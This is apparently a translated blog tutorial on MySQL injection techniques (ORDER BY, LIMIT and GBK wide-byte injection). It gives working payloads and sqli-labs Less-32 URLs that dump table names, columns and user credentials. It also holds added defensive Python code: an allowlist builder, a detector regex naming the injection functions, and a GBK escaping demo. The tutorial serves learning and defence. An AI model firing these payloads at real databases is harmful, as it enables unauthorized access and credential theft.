
SQL injection basics: ORDER BY injection, LIMIT injection, wide-byte injection

2022-08-10 23:49:00 Hold the kitten

Contents

ORDER BY

(1) Why ORDER BY injection exists

(2) Case 1: injection with an error-reporting function

(3) Case 2: injection with a delay function

(4) Case 3: blind injection with rand()

(5) Case 4: blind injection with if

LIMIT injection

(1) How LIMIT is used

(2) Case

Wide-byte injection

(1) What is a wide byte?

(2) Escape functions commonly seen with wide bytes

(3) Case: sqli-labs Less-32


ORDER BY

(1) Why ORDER BY injection exists

The ORDER BY clause in MySQL can be used to guess the number of columns in a table, and is then combined with a UNION SELECT statement to echo data.

But when the page displays MySQL error messages and ORDER BY is followed by a controllable parameter, the error message itself can be used for injection.

(2) Case 1: injection with an error-reporting function

 select * from users order by updatexml(1,if(1=2,1,concat(0x7e,database(),0x7e)),1);

(3) Case 2: injection with a delay function

 select * from users order by if(concat(0x7e,user(),0x7e),1,sleep(3));

 The delay is not 3 seconds: the number of rows queried × 3 gives the total delay time.

When the SQL statement is true there is a delay; when the SQL statement is false the page is displayed in normal time.

(4) Case 3: blind injection with rand()

The random number generated by the rand() function lies between 0 and 1, but when rand() is given a parameter, that parameter becomes a seed, and the random number generated from that seed is fixed.

We find that rand(0) and rand(1) sort the rows differently, so we can test again using Boolean-based blind injection:

 select * from users order by rand(ascii(mid((select database()),1,1))=8);

(5) Case 4: blind injection with if

When the if condition holds, the output order is shuffled; when the if condition does not hold, the output order does not change.


LIMIT injection

(1) How LIMIT is used

limit [offset,] row_count: the offset is the position from which MySQL's query analyzer starts displaying rows, and row_count is the number of records returned.

Basic usage:   select * from users limit 1,4;

 LIMIT can be followed by two clauses, PROCEDURE and INTO. INTO cannot be used unless we have the privilege to write a shell, so we look for an opening in PROCEDURE instead.

The benchmark function has two parameters: the first is the number of executions, the second is the function or expression to test.

For example benchmark(10000000, function(1))

This means the expression is executed 10000000 times; the increased amount of computation makes MySQL slow down and causes a delay, similar to a multi-table join / Cartesian product.

(2) Case

 select * from users limit 1 procedure analyse(extractvalue(rand(),concat(0x3a,benchmark(10000000,user()))),1);
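All the ORDER BY cases and the LIMIT case above come down to the same thing: a sort or paging parameter is pasted into the query text. ORDER BY takes an identifier and a keyword, which a placeholder cannot carry, so the only safe source for them is a fixed allowlist; LIMIT takes integers, so the inputs can be converted and bounded. The following Python is an added example, not code from the original post or from sqli-labs: it builds both clauses defensively and, separately, flags parameter values that contain the function calls used in the cases above (updatexml, extractvalue, sleep, rand, if, benchmark, procedure analyse). The column map, the row limit and the sample parameter values are assumptions constructed for this example.

```python
"""Added example, not code from the original post or from sqli-labs.

Defensive handling of the two clauses discussed above. ORDER BY takes an
identifier and a keyword, which a placeholder cannot carry, so the only
safe source for them is a fixed allowlist; LIMIT takes integers, so the
inputs are converted and bounded. A second, independent check flags
parameter values that contain the function calls used in the cases above.
All names and values here are assumptions made for the example."""
import re

# Hypothetical allowlist: request value -> real column name.
ALLOWED_SORT_COLUMNS = {"id": "id", "name": "username", "created": "created_at"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}
MAX_ROWS = 100


def build_order_and_limit(sort, direction, offset, count):
    """Return a safe 'ORDER BY ... LIMIT ...' suffix or raise ValueError.

    User-supplied strings never reach the SQL text: column and direction
    are looked up in fixed dictionaries, offset and count are converted
    to bounded non-negative integers, and anything else is rejected."""
    try:
        column = ALLOWED_SORT_COLUMNS[sort.lower()]
        order = ALLOWED_DIRECTIONS[direction.lower()]
    except KeyError:
        raise ValueError("sort column or direction not in allowlist") from None
    if not (offset.isdigit() and count.isdigit()):
        raise ValueError("offset and count must be non-negative integers")
    off, cnt = int(offset), int(count)
    if cnt < 1 or cnt > MAX_ROWS:
        raise ValueError("row count out of range")
    return f"ORDER BY {column} {order} LIMIT {off}, {cnt}"


def is_rejected(sort, direction, offset, count):
    """Helper for callers that only need a yes/no answer."""
    try:
        build_order_and_limit(sort, direction, offset, count)
    except ValueError:
        return True
    return False


# Function names used in the ORDER BY and LIMIT cases above. A genuine
# sort or paging parameter never contains a function call at all.
SUSPICIOUS = re.compile(
    r"\b(updatexml|extractvalue|sleep|benchmark|rand|if|procedure\s+analyse)\s*\(",
    re.IGNORECASE,
)


def flag_parameter(value):
    """Return the suspicious function names found in one parameter value,
    in order of appearance."""
    return [m.group(1).lower() for m in SUSPICIOUS.finditer(value)]


def scan_params(params):
    """Map each parameter label to its hits; labels without hits are dropped."""
    report = {}
    for label, value in params.items():
        hits = flag_parameter(value)
        if hits:
            report[label] = hits
    return report


# Constructed sample request parameters (not real traffic); the payload
# values are the ones quoted in the cases above.
SAMPLE_PARAMS = {
    "sort=name": "name",
    "sort=updatexml": "updatexml(1,if(1=2,1,concat(0x7e,database(),0x7e)),1)",
    "sort=rand": "rand(ascii(mid((select database()),1,1))=8)",
    "limit=1": "1",
    "limit=procedure": "1 procedure analyse(extractvalue(rand(),"
                       "concat(0x3a,benchmark(10000000,user()))),1)",
}

if __name__ == "__main__":
    print(build_order_and_limit("name", "desc", "0", "20"))
    print(scan_params(SAMPLE_PARAMS))
```

The allowlist is the real fix; the regex scan is only a monitoring aid for request logs or a WAF rule, since an attacker can rename nothing but a defender can still see which parameter carried a function call.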

Wide-byte injection

(1) What is a wide byte?

A wide-byte character is two bytes in size; GB2312, GBK, GB18030, BIG5, Shift_JIS and the like are what is usually meant by wide-byte encodings. Note that by default all English characters occupy one byte, while Chinese characters occupy two bytes.

(2) Escape functions commonly seen with wide bytes

  • addslashes(): returns a string with backslashes added before predefined characters

  • mysql_real_escape_string(): escapes special characters in a string for use in an SQL statement

  • mysql_escape_string(): escapes a string

(3) Case: sqli-labs Less-32

 It can be seen that the single quote is escaped; look at the source code.

 We add %df after the 1.

1. Why does adding %df let the single quote escape?

 This involves a MySQL characteristic: because GBK is a multibyte encoding, MySQL treats two bytes as one Chinese character, so %df together with the following \ (that is, %5c) becomes one Chinese character, "運", and the single quote escapes.

2. But how does MySQL decide whether a byte is an ordinary character or part of a Chinese character?

According to GBK encoding, a first byte with an ASCII value greater than 128 is basically enough to decide. For example, we replace %df with %a1.

 Once the single quote has escaped in this way, we can query the data in the database.

1. Get the tables in the database

http://127.0.0.1/sqli/Less-32/?id=-1%a1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+

 2. Get the columns of the users table

http://127.0.0.1/sqli/Less-32/?id=-1%df%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273)--+

 3. Get usernames and passwords

http://127.0.0.1/sqli/Less-32/?id=-1%df%27%20union%20select%201,2,(select%20group_concat(username,password)%20from%20security.users)--+
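The mechanism in the case above (the escape backslash %5c being swallowed as the trail byte of a GBK character) can be reproduced without a database. The following Python is an added example, not code from the original post or from sqli-labs: it imitates PHP's addslashes() at byte level, decodes the result the way a GBK connection would, checks whether the quote is still escaped, shows the decode-first escape that does not have the problem (which in PHP is what setting the connection charset, e.g. with mysqli_set_charset, gives the real escape function; prepared statements avoid the question entirely), and adds a small detection heuristic for the dangling lead byte that the %df%27 input relies on. Function names and the sample bytes are constructed for this example.

```python
"""Added example, not code from the original post or from sqli-labs.

Reproduces, without a database, why a byte-oriented escape such as PHP's
addslashes() stops protecting a single quote once the query is decoded
as GBK, shows the decode-first escape that does not have the problem,
and adds a small detection heuristic for the dangling lead byte that the
%df%27 input relies on. Function names and the sample bytes are
constructed for this example."""


def addslashes_bytes(raw):
    """Byte-level imitation of PHP addslashes(): a backslash is inserted
    before ' " \\ and NUL, with no knowledge of the character set."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def as_mysql_sees_it(escaped, charset):
    """Decode the escaped bytes as a connection using `charset` would.
    Undecodable bytes become U+FFFD so the demo never raises."""
    return escaped.decode(charset, errors="replace")


def quotes_still_escaped(text):
    """True when every single quote in the decoded text is still preceded
    by a backslash, i.e. the escaping survived decoding."""
    return all(i > 0 and text[i - 1] == "\\"
               for i, ch in enumerate(text) if ch == "'")


def escape_after_decoding(raw, charset):
    """The correct order: turn bytes into characters first, then escape.
    A backslash placed between characters cannot be absorbed into a
    multibyte sequence, which is what a correctly set connection
    charset gives mysql_real_escape_string() in PHP."""
    text = raw.decode(charset, errors="replace")
    return text.replace("\\", "\\\\").replace("'", "\\'")


def has_dangling_lead_byte(raw):
    """Walk the bytes as a GBK decoder does: a lead byte (0x81-0xFE)
    consumes the following byte as its trail. A trail below 0x40 (for
    instance the quote 0x27) or 0x7F is not valid GBK, so the lead byte
    is dangling; that is exactly the shape of id=1%df%27 above, while a
    genuine GBK character followed by a quote does not trigger it."""
    i = 0
    while i < len(raw):
        if 0x81 <= raw[i] <= 0xFE:
            if i + 1 >= len(raw) or raw[i + 1] < 0x40 or raw[i + 1] == 0x7F:
                return True
            i += 2
        else:
            i += 1
    return False


# Constructed sample: the parameter value 1%df' from the case above.
SAMPLE = b"1\xdf'"

if __name__ == "__main__":
    escaped = addslashes_bytes(SAMPLE)
    print("escaped bytes:", escaped)
    for cs in ("latin-1", "gbk"):
        view = as_mysql_sees_it(escaped, cs)
        print(cs, repr(view), "quote escaped:", quotes_still_escaped(view))
    print("decode first:", repr(escape_after_decoding(SAMPLE, "gbk")))
    print("dangling lead byte:", has_dangling_lead_byte(SAMPLE))
```

Decoded as latin-1 the backslash stays in front of the quote; decoded as GBK the bytes 0xDF 0x5C collapse into one character and the quote stands alone, which is the whole of the bug. The dangling-lead-byte check is only a heuristic for logs or a WAF; the fix is the charset-aware escape or, better, prepared statements.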

Original site

Copyright notice
This article was written by [Hold the kitten]; please include the original link when reposting, thanks.
https://yzsam.com/2022/222/202208102334569594.html